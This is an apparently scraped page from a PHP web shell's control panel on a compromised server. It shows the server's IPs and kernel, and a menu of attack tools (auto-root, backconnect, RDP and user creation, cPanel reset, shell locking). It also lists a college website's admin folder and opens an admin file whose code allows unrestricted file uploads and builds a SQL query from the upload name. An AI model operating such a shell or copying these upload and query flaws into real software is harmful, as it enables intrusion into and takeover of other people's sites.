Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.139.234.41
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
ocassion-folder
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
product-folder
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
aboutCollege.php
3.08
KB
-rw-r--r--
adminStaff.php
1.31
KB
-rw-r--r--
docs.php
1.13
KB
-rw-r--r--
dsw.php
1.5
KB
-rw-r--r--
fPrincipal.php
1.45
KB
-rw-r--r--
footer.php
1.89
KB
-rw-r--r--
gBody.php
1.79
KB
-rw-r--r--
header.php
11.56
KB
-rw-r--r--
homeBanner.php
1.44
KB
-rw-r--r--
index.php
1.81
KB
-rw-r--r--
invoice.html
8.32
KB
-rw-r--r--
login.php
3.33
KB
-rw-r--r--
login_process.php
644
B
-rw-r--r--
logout.php
95
B
-rw-r--r--
mCommittee.php
1.55
KB
-rw-r--r--
nTeaching.php
1.96
KB
-rw-r--r--
nep-2020.php
8.17
KB
-rw-r--r--
new_transaction.php
3.64
KB
-rw-r--r--
pAndS.php
1.55
KB
-rw-r--r--
pMessage.php
2.91
KB
-rw-r--r--
proctor.php
1.61
KB
-rw-r--r--
sMessage.php
1.78
KB
-rw-r--r--
slider1.php
3.93
KB
-rw-r--r--
slider2.php
3.55
KB
-rw-r--r--
teaching.php
1.95
KB
-rw-r--r--
updatepass.php
1.52
KB
-rw-r--r--
upload_docs.php
1.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : homeBanner.php
<?php include("include/db.php"); $page="banner"; if(isset($_POST["saveBanner"])) { $filename=$_FILES["hBanner"]["name"]; $name=$_FILES["hBanner"]["name"]; move_uploaded_file($_FILES["hBanner"]["tmp_name"],"uploads/home/" . $_FILES["hBanner"]["name"]); $date=date('Y-m-d'); $res=$con->query("INSERT INTO `banners`( `filename`, `date`) VALUES ('$name','$date') "); if($res) { echo "<script>alert('Uploaded Successfully')</script>"; echo "<script>window.location='homeBanner.php';</script>"; } else { echo "<script>alert('Something Error!!!')</script>"; } } ?> <body> <?php include("header.php"); ?> <div class="content-wrapper"> <div class="container-fluid"> <div class="card m-1 row"> <div class="card-header text-success">Home Banner </div> <div class="card-body row"> <div class="col-6 offset-3 form-group"> <form method="post" action="" enctype="multipart/form-data"> <label>Select Image:</label> <input type="file" name="hBanner" class="form-control" accept="Image/*" onchange="showPreview(this,prvimg)"> <div class="row mt-3 mb-3"> <img src="images/noimage.png" class="m-2" style="height:200px;width:100%" id="prvimg"> </div> <button class="btn btn-primary form-control" name="saveBanner">Save</button> </form> </div> </div> </div> </div> </div> <?php include("footer.php"); ?> </body>
Close